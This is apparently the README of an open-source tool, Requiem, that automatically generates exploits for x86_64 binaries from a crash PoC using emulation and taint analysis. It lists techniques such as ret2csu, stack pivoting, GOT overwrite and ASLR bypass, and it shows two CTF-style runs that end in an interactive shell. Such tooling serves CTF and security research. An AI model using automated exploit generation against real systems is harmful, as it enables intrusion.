Modularized exploit generation framework for x86_64 binaries
Overview
This project is still at early stage of development, so you might want to come back later...
Requiem is a modularized exploit generator for x86_64 binaries which emulates the target program with Qiling, and uses the user-provided PoC as the target program's input. During the target program's execution, Requiem monitors its I/O-related behaviors and employs taint analysis to collect information that can be later used for exploitation.
To use Requiem, a PoC must be provided because Requiem cannot perform symbolic execution. The target program will follow the execution path formed by the PoC, and when the target program reaches the crash state, Requiem will determine whether the crash state is exploitable by checking if RIP has been tainted.
If RIP has been tainted at the crash state, Requiem will generate an exploit which:
- guides the target program to the exploitable state
- exploits the program based on the strategy specified by the user.
Modularized?
Def: An exploitation "strategy" consists of a list of exploitation "techniques".
The idea is to implement some well-known exploitation techniqes as reusable and configurable "modules". The user can use the built-in techniques to exploit a x86_64 binary, or write a custom strategy/techniques to deal with Ad-hoc problems.
Implemented Techniques
- ret2win (return to an arbitrary function specified by the user)
- ret2csu (handling of different variants of __libc_csu_init is not implemented yet)
- basic stack pivot (
read(0, bss+n, 1024),pop rbp ; ret,leave ret) - advanced stack pivot (requires at least one call site of
read()) - GOT partial overwrite (overwrite LSB of [email protected] to acquire
syscall, thensys_execve("/bin/sh", 0, 0)) - mprotect + shellcode
- ret2dlresolve
- simple ASLR bypass (leak PIE/libc base addresses using available read primitives)
- advanced ASLR bypass (leak PIE/libc base addresses with _IO_file_write when there are no read primitives)
- ...
Implemented PoC Types
- stdin
- file
- socket
- ...
Dependencies
Installation
git clone https://github.com/aesophor/requiem
cd requiem
git submodule update --init --recursive
Examples
1. pwnable.tw: unexploitable (500 PTS)
The original challenge is on pwnable.kr and it is solvable.
This time we fix the vulnerability and now we promise that the service is unexploitable.
source
#include <stdio.h>
#include <unistd.h>
int main() {
sleep(3);
char buf[4];
read(0, buf, 256);
}
checksec
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
result
$ ./requiem.py 'examples/unexploitable/unexploitable' 'examples/unexploitable/poc' --exec
--- Requiem: Modularized Exploit Generation Framework ---
Developed by: Marco Wang <[email protected]>
(skipped a few lines)
[x] Error: PC(0x4141414141414141) Unreachable
[x] RIP tainted. Generating exploit...
[=] Generating exploit...
[=] Deduced offset: 4 bytes
write primitives: [[4198745, 140737488412076, 256]]
write primitives: [[4198745, 140737488412076, 256]]
[=] Generated exploit: examples/unexploitable/unexploitable_exploit.py
[=] Executing exploit: examples/unexploitable/unexploitable_exploit.py
================================================================================
[+] Starting local process '/home/aesophor/Code/requiem/examples/unexploitable/unexploitable': pid 402588
[*] Switching to interactive mode
$ ls
README.md examples libs requiem requiem.py
$
2. CS 2017 Fall: readme
The length of stack-buffer overflow is very limited.
Only the saved RBP and the return address is controllable by the attacker.
source
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
char buf[0x20];
setvbuf(stdout, 0, _IONBF, 0);
printf("overflow me:");
read(0, buf, 0x30);
}
checksec
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
result
$ ./requiem.py 'examples/readme/readme' 'examples/readme/poc' --exec
--- Requiem: Modularized Exploit Generation Framework ---
Developed by: Marco Wang <[email protected]>
(skipped a few lines)
[x] Error: PC(0x4141414141414141) Unreachable
[x] RIP tainted. Generating exploit...
[=] Generating exploit...
[=] Deduced offset: 32 bytes
write primitives: [[4198801, 140737488412064, 48]]
write primitives: [[4198801, 140737488412064, 48]]
[=] Generated exploit: examples/readme/readme_exploit.py
[=] Executing exploit: examples/readme/readme_exploit.py
================================================================================
[+] Starting local process '/home/aesophor/Code/requiem/examples/readme/readme': pid 402513
[*] Switching to interactive mode
overflow me:$ ls
README.md examples libs requiem requiem.py
$
15 Jul 11, 2022
11 Jun 14, 2022
5 Nov 08, 2022
4 Feb 20, 2022
2 Nov 16, 2021
7 Nov 17, 2022
121 Dec 14, 2022
5 Nov 18, 2022
53 Nov 09, 2022
3 Dec 16, 2022
16 Dec 19, 2022
5 Mar 21, 2022
96 Dec 20, 2022
3 Dec 04, 2022
5 Dec 10, 2021
329 Jan 01, 2023
2 Jan 31, 2022
26 Dec 26, 2022
4 Nov 24, 2021
1 Dec 24, 2021